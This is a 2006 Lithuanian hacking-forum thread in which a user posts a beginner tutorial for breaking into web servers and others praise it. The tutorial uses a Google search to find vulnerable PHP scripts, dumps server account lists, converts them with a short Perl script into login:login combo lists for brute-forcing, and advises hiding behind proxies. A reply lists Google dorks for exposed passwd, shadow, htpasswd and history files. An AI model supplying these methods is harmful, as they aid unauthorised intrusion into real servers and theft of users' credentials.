[phpBB Debug] PHP Warning: in file [ROOT]/viewtopic.php on line 22: include(./includes/bbcode.php): failed to open stream: No such file or directory
[phpBB Debug] PHP Warning: in file [ROOT]/viewtopic.php on line 22: include(): Failed opening './includes/bbcode.php' for inclusion (include_path='.:/opt/alt/php74/usr/share/pear')
Straipsniai.lt •Lauzhimo technika.By.DarkForce
Puslapis 17

Lauzhimo technika.By.DarkForce

Parašytas: 2006 09 06 18:49
DF
Skyletas Skriptas Web Serveryje.Lauzhimo Technika:

Taigi daugumai tai nenaujiena, bet pradzhiamoksliam bus manau toks visai vertingas tekstukas.
Pradedam:

Negaliu gyventi be google.lt todel ir pradekim nuo jos.Google galingas paieshkos resuras, todel su pastaraja galima daug ka nuveikti ir isilauzhiams, shiuo atveju su google be vargo surasi skyleta skripta web serveryje.

Isijungiam savo narshykle ir einam i :arrow:


I uzhklausos eilute ivedam tokia uzhklausa Filetype:php filename:article

Paveikslėlis

Ir spustelejam mygtuka "Ieshkoti"
Google jau po vienos akimirkos ishmes daugybe rezultatu su pazheidzhiamais skriptais, kuriuos ishnaudojas gali shita peshti :}.
Taigi ash klaidzhioju per rezultatus ir mano aki patraukia vienas Arabu puslapis.
Paveikslėlis

Taigi tuojau pat nelaukia, uzhsukam i puslapi ir shiek tiek pakoreguojam jo nuoroda.

Ish:
I:
Po shio zhingsnio, serveris, pradineme puslapio lange "ishspjaus" mums naudingos informacijos apie serveri, jai ja tiksliai panaudosim mums nusishipsos sekme :}.

Taigi mes gauname toki rezultata:

Paveikslėlis

Kuri, narsykles kamputyje paspaudus Funkcija file>save as ishsaugom *.txt fomatu i savo kompiuteri.

Esme yra tame jog perinkus login:login poras ir panaudojus jas kaip Combo list'us gali labai lengvai nubrutinti viena ish daugybes, web serverio vartotoju.O shis zhingsnis pariartins tave dar labiau prie ishsvajotoju "root teisiu" :}.

Kad perinktume login:login poras ish to isheities teksto, mums reikia pasirashyi nedideli perl skriptuka.
Siulichiau toki:
#!/usr/bin/perl

open(D,'<lol.txt');
open(R,'>lol1.txt');
while (<D>) {
($vardas,$koduotas,$uid,$gid,$cos,$home,$shell)=split(/:/);
print R "$vardas:$vardas\n";
}
close(D);
close(R);
Po ivykdito shio skripto jusu login:login poros ishsisaugos lol1.txt dokumente.
Paveikslėlis

Taigi jai viska padarete teisingai jau po 1 minutes turesite nulauzhta vartotojo varda ir password'a.Ka toliau daryti tai jau jusu reikalas.Nepamirshkite Proxy ir pasukti galveles.

Parašytas: 2006 09 06 18:59
Dreigons
Geras toturial'ias :)
Tikrai daug kam padės. :) Tik tikėkimes, kad bus išnaudota protingai. :wink:

Parašytas: 2006 09 06 19:21
koksas
kaip ta scriptuka panaudot?

Parašytas: 2006 09 06 19:35
MaksasMks
Apie lb panašų laužimosi dalyka skaičiau kažkokiam žurnale, bet lb seniai. Kad per google.lt būtų įmanoma surasti kokius lb gerus saitus su klaidom, o db visokius sh aš randu iš kuriu naudos nėra tik for fun.

Parašytas: 2006 09 06 19:44
Dreigons
MaksasMks rašė:Apie lb panašų laužimosi dalyka skaičiau kažkokiam žurnale, bet lb seniai. Kad per google.lt būtų įmanoma surasti kokius lb gerus saitus su klaidom, o db visokius sh aš randu iš kuriu naudos nėra tik for fun.
Kitaip sakant mėto internetines šiukšles? :) O aš niekada nesikesinu i web for fun :)

Parašytas: 2006 09 06 19:50
MaksasMks
Kitaip sakant mėto internetines šiukšles?
Panašiai.

Parašytas: 2006 09 06 20:09
DF
MaksasMks rašė:Apie lb panašų laužimosi dalyka skaičiau kažkokiam žurnale, bet lb seniai. Kad per google.lt būtų įmanoma surasti kokius lb gerus saitus su klaidom, o db visokius sh aš randu iš kuriu naudos nėra tik for fun.
Panashus dalykas buvo parashytas Hakerio zhurnale. Tachiau chia nenaujienu ir ash toki lauzhimo buda zhinau seniai.

Parašytas: 2006 09 06 21:35
MaksasMks
Vienaip ar kitaip pamoka lb gerai, visos aiškios pamokos gerai.

Parašytas: 2006 09 06 21:51
DF
MaksasMks rašė:Vienaip ar kitaip pamoka lb gerai, visos aiškios pamokos gerai.
Butent.

Parašytas: 2006 09 07 13:02
zigzag
Dar(k)Force kokiu dar budu zinai kai nulauzti weba

Parašytas: 2006 09 07 14:02
DF
zigzag rašė:Dar(k)Force kokiu dar budu zinai kai nulauzti weba
Priklausomai nuo aplinkybiu. Kiekvienas puslapis ar serveris turi kitokia specifika.

Parašytas: 2006 09 07 17:59
Xgreem
Pateiksiu dar kelias google uzklausas:
intitle:"index of" etc
intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
"# -FrontPage-" inurl:service.pwd
intext:ZeroBoard filetype:php
intitle:phpmyadmin intext:Create new database
allinurl:bbs data
filetype:mdb inurl:database
filetype:inc conn
inurl:data filetype:mdb
sekmes...
:roll:

Parašytas: 2006 09 07 19:27
DF
Xgreem rašė:Pateiksiu dar kelias google uzklausas:
intitle:"index of" etc
intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
"# -FrontPage-" inurl:service.pwd
intext:ZeroBoard filetype:php
intitle:phpmyadmin intext:Create new database
allinurl:bbs data
filetype:mdb inurl:database
filetype:inc conn
inurl:data filetype:mdb
sekmes...
:roll:
Chia jau kitas biesas pagal viska.

Parašytas: 2006 09 07 19:36
Qw3rty
kinda good text *16*
naujokams patiks, igivendins svajone-1st hack 8)

Parašytas: 2006 09 07 21:41
Xgreem
Man su ta uzklausa nei vieno link neismet... :cry: